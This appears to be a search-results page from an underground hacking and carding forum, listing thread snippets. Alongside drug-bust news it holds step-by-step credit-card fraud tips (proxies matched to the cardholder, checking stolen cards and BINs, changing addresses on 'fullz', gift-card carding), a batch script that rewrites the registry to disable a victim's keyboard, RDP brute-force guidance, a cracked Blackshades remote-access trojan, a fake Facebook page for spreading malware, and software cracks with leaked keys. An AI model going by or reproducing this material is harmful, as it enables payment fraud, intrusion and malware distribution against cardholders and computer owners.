Search results

  1. Old School

    £1.3 MILLION cannabis factory found UK

    £1.3 MILLION cannabis factory found as four illegal Indian workers arrested in Smethwick immigration raid Four illegal workers from India were arrested in an immigration raid in Smethwick - which also uncovered a £1.3m cannabis factory with 2,000 plants. Police discovered the haul of drugs...
  2. Old School

    Shiny Flakes Sentenced To 7 Years

    On Monday, Maximilian S. AKA Shiny Flakes, the 20 years old dark web dealer, has been sentenced for 7 years of youth sentence in prison for illegally trafficking drugs in large quantities by the Leipzig District Court. Norbert Göbel, the judge of the case has said that the act Maximilian S. was...
  3. Old School

    QuantikXanax Releases Intel from DrXanax Bust

    Here is an audio file. it is the audio recording of the micro of my spy in drxanax team court room. I have over 4 hours, but for convenience i have only included Part 2 of 4, because it is where LE explains how they busted them in roughly 30-40 minutes its in french. The file can be found here...
  4. Old School

    Professional carding tips

    Use socks5 ( dont use socks4 or http proxies as they might leak DNS info) which match the cardholder's billing address. If your CC is from UK, try to use a UK drop and so on for other countries If the gift option is there, put it so it looks like you are shipping a gift to some friend...
  5. Old School

    Method to check your CC's

    One of the problems most online carders face everyday is checking cc's. Most shops checker's are f**ked up , it kills cc's just like some other online cheker's. NOTE: This method is not for checking CC billing address it is for only CCN n EXP DATE. Here is what u will need a voip or simple a...
  6. Old School

    Method to check BINS

    Most of you use , or others that can have some false results , !! I advise all to use this , Very efficace , easy to use , and no shit CAPTCHA like binbase or wtv.... and works also as you can search not only PER BIN , but you can search by type , class , credit/debit , country ...
  7. Old School

    Change Address on Fullz

    This tutorial is based towards UK Fulls as I don't know the procedure for USA Fulls. Ok, so you went along and bought some UK Fullz and you find the site you want to card but they only ship to the billing.. And you really wanted those pair jeans which makes you mad and frustrated lol... Well...
  8. Old School

    Amazon Gift Card carding easy way

    1, Put on UK VPN or SOCK5 2. Clear all cookies with ccleaner or any good software 3. Get UK cc (Visa works best) 3. Go to then create email with name of cc ( If cc name is John Smith, make [You must be registered and logged in to see this link.] or similar) 4. Go to and...
  9. Old School

    Vuln SQLi's
  10. Old School

    Waybackmachine !

    I know some of you want to see a forum but FBI seized the forum or site blah blah blah so all you need is go here and put the url of your website click browse history and then select a snapshot and.. Boom ! you now can see the site !
  11. Old School

    Give ur Victim a Porn Attack

    1) Disable your Victims Keyboard @echo off echo Windows Registry Editor Version 5.00 > "nokeyboard.reg" echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg" echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"...
  12. Old School

    Fake Facebook Video [SPREADER !!!]

    Hi Guys! I recently make a fake YouTube page for spreading my virus and I got a some installs quite easily. Than I decide to make one for facebook too, and here is! I made a demo only for this threat, so don't be afraid to click "Install" there is no virus! You will be download just notepad...
  13. Old School

    Cracking the Credit Card Code ! [IMAGE]

    ENjoy !
  14. Old School

    How to use Google as a proxy !

    Today i will show a new trick i found yesterday, how to use Google as a proxy (transparent). It's pretty easy. All you need to do is : 1 - Go to Google Translate. 2 - Translate from 'Detect Language' to your language , in my case 'Albanian'. 3 - Now there type a website , (beggining with...
  15. Old School

    How to Crack Remote Desktops [RDP]

    Scanning and Cracking into Remote Desktops First off, go get yourself Angry IP Scanner If you dont have it, download it here: Now that you should have it, open it up and go to 1- Options (ctrl + O) 2- select ports 3- 3389 Now enter in an IP Range. Here is a...
  16. Old School

    Blackshades v5.3 Cracked!

    *Updated* Alright i took sometime to fix the errors File CRC etc i also added Logs.txt patching method is now better using function hooking (0xE9) Here is updated version Instructions: 1.Extract in the BS Folder 2.Double click Injector.exe 3.Enjoy 100% CLEAN ...
  17. Old School

    SendBlaster PRO ! [ Mass Mailling ! ]

    Installed SendBlaster Free, you will find the setup program here: Here is your registration account: E-mail: [email protected] Registration code: 47E5-7265-36D2-6E48-7CFD Thank you for buying SendBlaster Pro!
  18. Old School

    No Hands Seo 1.7.15

    == INSTALLATION INSTRUCTIONS == 1- Install No Hands SEO 2- Copy following lines at the end of your hosts file and save. (Hosts file is located here:- C:\windows\system32\drivers\etc\) # #...
  19. Old School

    SeNuke X 2.6.40

    == 1- Run Setup to install/update SenukeX (If you have senuke site into your hosts file then MUST REMOVE it before running senuke setup.) 2- Copy "SENuke.exe" and "SENukeRecovery.exe" files from "Crack" Folder and Paste into the SENukeX installation directory. Click Yes when asked to "Copy &...
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